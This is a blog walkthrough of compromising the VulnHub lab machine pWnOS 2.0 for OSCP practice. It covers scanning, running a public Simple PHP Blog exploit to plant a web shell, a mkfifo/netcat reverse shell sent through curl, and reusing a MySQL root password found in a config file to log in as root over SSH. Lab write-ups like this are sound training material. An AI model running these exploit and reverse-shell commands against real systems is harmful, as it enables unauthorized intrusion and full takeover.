Analytify (Bug): cURL error 77: error setting certificate verify locations: CAfile: /etc/nginx/ssl/cacert.pem CApath: /etc/ssl/certs (see https://curl.haxx.se/libcurl/c/libcurl-errors.html) for https://oauth2.googleapis.com/token pWnOS 2.0 Walkthrough (OSCP Prep) - c0dedead.io

pWnOS 2.0 Walkthrough (OSCP Prep)

pWnOS 2.0 Walkthrough (OSCP Prep)

Introduction

In today’s installment in the OSCP Prep series, we’ll walk through owning pWnOS v2.0 from VulnHub.

pWnOS turned out to be a very simple machine requiring no more than basic enumeration to gain a foothold and move on to root quickly.


Before We Begin

According to the description, the pWnOS VM is set up with a static IP of 10.10.10.100. We’ll have to adjust our virtual network configuration accordingly in order to have connectivity to the machine. The virtual machines settings:

  • IP: 10.10.10.100
  • Netmask: 255.255.255.0
  • Gateway: 10.10.10.15

I’ll also add the machine to the /etc/hosts file before beginning scanning.


Scanning

We’ll use RustScan to find any open ports and try to find some version information from Nmap.

(ori0n@apophis) --> [ ~/pwnos ]
  ==> rustscan -a pwnos -- -sV -oA scans/nmap-initial
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/ori0n/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.10.100:80
Open 10.10.10.100:22
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -oA scans/nmap-initial" on ip 10.10.10.100
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-15 07:44 CDT
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 07:44
Scanning 10.10.10.100 [2 ports]
Completed Ping Scan at 07:44, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 07:44
Scanning pwnos (10.10.10.100) [2 ports]
Discovered open port 80/tcp on 10.10.10.100
Discovered open port 22/tcp on 10.10.10.100
Completed Connect Scan at 07:44, 0.00s elapsed (2 total ports)
Initiating Service scan at 07:44
Scanning 2 services on pwnos (10.10.10.100)
Completed Service scan at 07:45, 6.02s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.100.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 07:45
Completed NSE at 07:45, 0.01s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 07:45
Completed NSE at 07:45, 0.00s elapsed
Nmap scan report for pwnos (10.10.10.100)
Host is up, received syn-ack (0.00035s latency).
Scanned at 2021-08-15 07:44:57 CDT for 6s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.2.17 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.39 seconds

SSH is typically not an attack vector, so we’ll begin with port 80.


Enumerating the Web Server

Launch a browser and head to http://pwnos. We’re greeted with an internal website.

IsIntS Internal Website

We can try SQL injection on the “Login” page, and it seems to work, however we are never redirected anywhere useful.

Attempting to log in with SQL injection
It appears to work, but we are never redirected

Let’s use gobuster to search for any hidden file or folders.

(ori0n@apophis) --> [ ~/pwnos ]
  ==> gobuster dir -u http://pwnos -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://pwnos
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/08/15 07:53:06 Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 854]
/blog                 (Status: 301) [Size: 297] [--> http://pwnos/blog/]
/login                (Status: 200) [Size: 1174]
/register             (Status: 200) [Size: 1562]
/info                 (Status: 200) [Size: 49828]
/includes             (Status: 301) [Size: 301] [--> http://pwnos/includes/]
/activate             (Status: 302) [Size: 0] [--> http://10.10.10.100/index.php]
/server-status        (Status: 403) [Size: 286]

===============================================================
2021/08/15 07:53:47 Finished
===============================================================

It looks like we have a blog available. Let’s check it out.


Getting a Foothold

So we have the blog app version. Are there any public exploits?

(ori0n@apophis) --> [ ~/pwnos ]
  ==> searchsploit simple php blog 0.4.0
------------------------------------------------------------------------ -----------------------
 Exploit Title                                                          |  Path
------------------------------------------------------------------------ -----------------------
Simple PHP Blog 0.4.0 - Multiple Remote s                               | php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)           | php/webapps/16883.rb
------------------------------------------------------------------------ -----------------------
Shellcodes: No Results

We want to avoid Metasploit, so let’s download the Perl script and have a look.

(ori0n@apophis) --> [ ~/pwnos ]
  ==> searchsploit -m php/webapps/1191.pl
  Exploit: Simple PHP Blog 0.4.0 - Multiple Remote s
      URL: https://www.exploit-db.com/exploits/1191
     Path: /usr/share/exploitdb/exploits/php/webapps/1191.pl
File Type: Perl script text executable

Copied to: /home/ori0n/pwnos/1191.pl



(ori0n@apophis) --> [ ~/pwnos ]
  ==> mv 1191.pl sploit.pl

(ori0n@apophis) --> [ ~/pwnos ]
  ==> ./sploit.pl

________________________________________________________________________________
                  SimplePHPBlog v0.4.0 Exploits
                             by
                     Kenneth F. Belva, CISSP
                   http://www.ftusecurity.com
________________________________________________________________________________

        Program : ./sploit.pl
        Version : v0.1
        Date    : 8/25/2005
        Descript: This perl script demonstrates a few flaws in
                  SimplePHPBlog.

        Comments: THIS PoC IS FOR EDUCATIONAL PURPOSES ONLY...
                  DO NOT RUN THIS AGAINST SYSTEMS TO WHICH YOU DO
                  NOT HAVE PERMISSION TO DO SO!

                  Please see this script comments for solution/fixes
                  to demonstrated vulnerabilities.
                  http://www.simplephpblog.com

        Usage   : ./sploit.pl [-h host] [-e exploit]

                -?      : this menu
                -h      : host
                -e      : exploit
                        (1)     : Upload cmd.php in [site]/images/
                        (2)     : Retreive Password file (hash)
                        (3)     : Set New User Name and Password
                                [NOTE - uppercase switches for exploits]
                                -U      : user name
                                -P      : password
                        (4)     : Delete a System File
                                -F      : Path and System File

        Examples: ./sploit.pl -h 127.0.0.1 -e 2
                  ./sploit.pl -h 127.0.0.1 -e 3 -U l33t -P l33t
                  ./sploit.pl -h 127.0.0.1 -e 4 -F ./index.php
                  ./sploit.pl -h 127.0.0.1 -e 4 -F ../../../etc/passwd
                  ./sploit.pl -h 127.0.0.1 -e 1

It looks like we can upload a PHP shell. Let’s give it a shot.

(ori0n@apophis) --> [ ~/pwnos ]
  ==> ./sploit.pl -h http://pwnos/blog -e 1

________________________________________________________________________________
                  SimplePHPBlog v0.4.0 Exploits
                             by
                     Kenneth F. Belva, CISSP
                    http://www.ftusecurity.com
________________________________________________________________________________
Running cmd.php Upload Exploit....


Retrieved Username and Password Hash: $1$weWj5iAZ$NU4CkeZ9jNtcP/qrPC69a/
Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: a
Password is set to: a
Logged into SimplePHPBlog at: http://pwnos/blog/login_cgi.php
Current Username 'a' and Password 'a'...
Created cmd.php on your local machine.
Created reset.php on your local machine.
Created cmd.php on target host: http://pwnos/blog
Created reset.php on target host: http://pwnos/blog
Removed cmd.php from your local machine.
Failed to POST 'http://pwnos/blog/images/reset.php': 500 Internal Server Error at ./sploit.pl line 418.
Removed reset.php from your local machine.

(ori0n@apophis) --> [ ~/pwnos ]
  ==> curl "http://pwnos/blog/images/cmd.php?cmd=id;ls+-la"


<hr/><pre>Command: id;ls -la</pre><hr/><br><pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 16
drwxrwxrwx  2 www-data www-data 4096 Jun 20 17:16 .
drwxrwxrwx 11 root     root     4096 May  9  2011 ..
-rw-r--r--  1 www-data www-data  172 Jun 20 17:16 cmd.php
-rw-r--r--  1 www-data www-data  113 Jun 20 17:16 reset.php
</pre><hr/>.

We have command execution! Now let’s get a better shell. Do we have Netcat available?

(ori0n@apophis) --> [ ~/pwnos ]
  ==> curl "http://pwnos/blog/images/cmd.php?cmd=which+nc"


<hr/><pre>Command: which nc</pre><hr/><br><pre>/bin/nc
</pre><hr/>.

We do. Is it a helpful version or the pesky OpenBSD build?

(ori0n@apophis) --> [ ~/pwnos ]
  ==> curl "http://pwnos/blog/images/cmd.php?cmd=nc+-h+2>%261"


<hr/><pre>Command: nc -h 2>&1</pre><hr/><br><pre>OpenBSD netcat (Debian patchlevel 1.89-3ubuntu5)
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-P proxy_username] [-p source_port]
          [-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_protocol]
          [-x proxy_address[:port]] [hostname] [port[s]]
        Command Summary:
                -4              Use IPv4
                -6              Use IPv6
                -D              Enable the debug socket option
                -d              Detach from stdin
                -h              This help text
                -i secs         Delay interval for lines sent, ports scanned
                -k              Keep inbound sockets open for multiple connects
                -l              Listen mode, for inbound connects
                -n              Suppress name/port resolutions
                -P proxyuser    Username for proxy authentication
                -p port         Specify local port for remote connects
                -q secs         quit after EOF on stdin and delay of secs
                -r              Randomize remote ports
                -S              Enable the TCP MD5 signature option
                -s addr         Local source address
                -T ToS          Set IP Type of Service
                -C              Send CRLF as line-ending
                -t              Answer TELNET negotiation
                -U              Use UNIX domain socket
                -u              UDP mode
                -v              Verbose
                -w secs         Timeout for connects and final net reads
                -X proto        Proxy protocol: "4", "5" (SOCKS) or "connect"
                -x addr[:port]  Specify proxy address and port
                -z              Zero-I/O mode [used for scanning]
        Port numbers can be individual or ranges: lo-hi [inclusive]
</pre><hr/>.

It’s the OpenBSD version. No worries. We’ll just use the pipe trick: rm /tmp/f; mkfifo /tmp/f; bash < /tmp/f | nc 10.10.10.10 4444 > /tmp/f 2>&1. We’ll set up a listener in another terminal and see if we can catch a shell.

(ori0n@apophis) --> [ ~/pwnos ]
  ==> curl "http://pwnos/blog/images/cmd.php?cmd=rm+/tmp/f;mkfifo+/tmp/f;bash</tmp/f|nc+10.10.10.10+4444>/tmp/f+2>%261"

And it works! We’ve got our shell.


On to root

With a shell in hand, let’s enumerate the web server from the inside. We find a potentially juicy file.

cd /var/www
ls -l
total 36
-rw-r--r--  1 root root 1374 Mar 24  2008 activate.php
drwxrwxrwx 11 root root 4096 May  9  2011 blog
drwxr-xr-x  2 root root 4096 May  7  2011 includes
-rw-r--r--  1 root root  629 May  7  2011 index.php
-rw-r--r--  1 root root   23 Apr  3  2008 info.php
-rw-r--r--  1 root root 3091 May  7  2011 login.php
-rw-r--r--  1 root root  516 Apr  2  2008 mysqli_connect.php
-rw-r--r--  1 root root 4618 Apr  2  2008 register.php
head mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');

Unfortunately, this password doesn’t seem to actually get us into the database. Moving on.

cd ..
ls -l
total 56
drwxr-xr-x  2 root root  4096 Apr 21  2011 backups
drwxr-xr-x  8 root root  4096 May  7  2011 cache
drwxrwxrwt  2 root root  4096 May  7  2011 crash
-rw-r--r--  1 root root   177 May  7  2011 index.html
drwxr-xr-x 34 root root  4096 May  7  2011 lib
drwxrwsr-x  2 root staff 4096 Apr 21  2011 local
drwxrwxrwt  4 root root    80 Jun 20 16:33 lock
drwxr-xr-x 11 root root  4096 Jun 20 16:32 log
drwxrwsr-x  2 root mail  4096 May  7  2011 mail
-rw-r--r--  1 root root   520 May  7  2011 mysqli_connect.php
drwxr-xr-x  2 root root  4096 May  7  2011 opt
drwxr-xr-x 10 root root   420 Jun 20 16:32 run
drwxr-xr-x  4 root root  4096 May  7  2011 spool
drwxrwxrwt  2 root root  4096 Apr 21  2011 tmp
drwxr-xr-x  2 root root  4096 May  7  2011 uploads
drwxr-xr-x  4 root root  4096 May  9  2011 www
head mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');

What’s this? Another MySQL root password? Let’s try this one.

mysql -u root -p
root@ISIntS
show databases;
quit;
Database
information_schema
ch16
mysql

It’s going to be a pain to try to use MySQL from this netcat shell. We’ll need to upgrade our shell, but first, let’s see if password reuse is an issue on this box. Can root log in through SSH?

grep -i root /etc/ssh/sshd_config
PermitRootLogin yes
# the setting of "PermitRootLogin without-password".

He can. Let’s try this password from another terminal.

(ori0n@apophis) --> [ ~/pwnos ]
  ==> ssh root@pwnos
root@pwnos's password:
Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)

 * Documentation:  http://www.ubuntu.com/server/doc

  System information as of Sun Jun 20 17:33:53 EDT 2021

  System load:  0.0               Processes:           80
  Usage of /:   3.0% of 38.64GB   Users logged in:     0
  Memory usage: 26%               IP address for eth0: 10.10.10.100
  Swap usage:   0%

  Graph this data and manage this system at https://landscape.canonical.com/
Last login: Mon May  9 19:29:03 2011
root@web:~# id
uid=0(root) gid=0(root) groups=0(root)

And it works! Winner, winner, chicken dinner!

There is no flag on this system. We’ve got root. We’ve won.


Wrapping Up

pWnOS 2.0 was a fun box, but a very quick own. It will be worth coming back to later to look for other methods to get root.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.